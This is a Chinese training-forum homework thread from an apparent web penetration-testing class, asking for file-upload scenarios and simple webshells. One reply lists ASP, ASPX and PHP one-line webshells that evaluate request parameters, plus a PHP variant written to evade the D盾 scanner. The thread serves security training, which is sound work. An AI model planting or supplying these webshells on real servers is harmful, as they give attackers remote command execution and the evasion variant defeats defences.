图文精华

易锦教育»学术中心 学术交流社区 作业中心 WEB渗透测试精英班(第一期) 20210911作业
分享

20210911作业

本帖最后由 恐龙先生 于 2021-9-12 12:46 编辑

1,文件上传的场景列举3种
2,常见的简单webshell请列出3条
附加可选题:
自己造1条webshell过D盾,要求能利用且截图利用成功的截图




回复

使用道具 举报

已有(5)人评论

跳转到指定楼层
Deepred0 发表于 2021-9-13 17:44:04
作业作业作业

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

金木 发表于 2021-9-14 18:18:21

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

阿轩 发表于 2021-9-15 09:32:17
webshell过D盾

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

mlq 发表于 2021-9-20 08:59:43
本帖最后由 mlq 于 2021-9-20 09:02 编辑

[size=12.0811pt]上传场景:
[size=12.0811pt]用户头像、网页附件、投诉反馈上传附件、在线交谈发送图片、流程申请提交附件、身份证
[size=12.0811pt]认证上传、商城用户上传图片、OA系统文件上传
[size=12.0811pt]常见webshell
[size=12.0811pt]asp:
[size=12.0811pt]<%eval request("1")%>
[size=12.0811pt]<%eval(request("2"))%>
[size=12.0811pt]<%execute request("3")%>
[size=12.0811pt]<%execute(request("4"))%>
[size=12.0811pt]<%executeglobal request("5")%>
[size=12.0811pt]<%executeglobal(request("6"))%>
[size=12.0811pt]aspx:
[size=12.0811pt]<%@ Page Language="Jscript"%><%eval(Request.Item[1],"unsafe");%>
[size=12.0811pt]php:
[size=12.0811pt]<?eval($_REQUEST[1])?>
[size=12.0811pt]<?eval($_GET[2])?>
[size=12.0811pt]<?eval($_POST[3])?>
[size=12.0811pt]<?assert($_REQUEST[1])?>
[size=12.0811pt]<?assert($_GET[2])?>
[size=12.0811pt]<?assert($_POST[3])?>
[size=12.0811pt]webshell过D盾  [size=16.1081px]<?php class a {static $d;function b(){a:d="$_POST[cmd]";eval(a:d);}}call_user_func(array("a", "b"));?>
[size=12.0811pt]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

陈亚钧 发表于 2021-9-23 01:13:20
来迟的作业

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则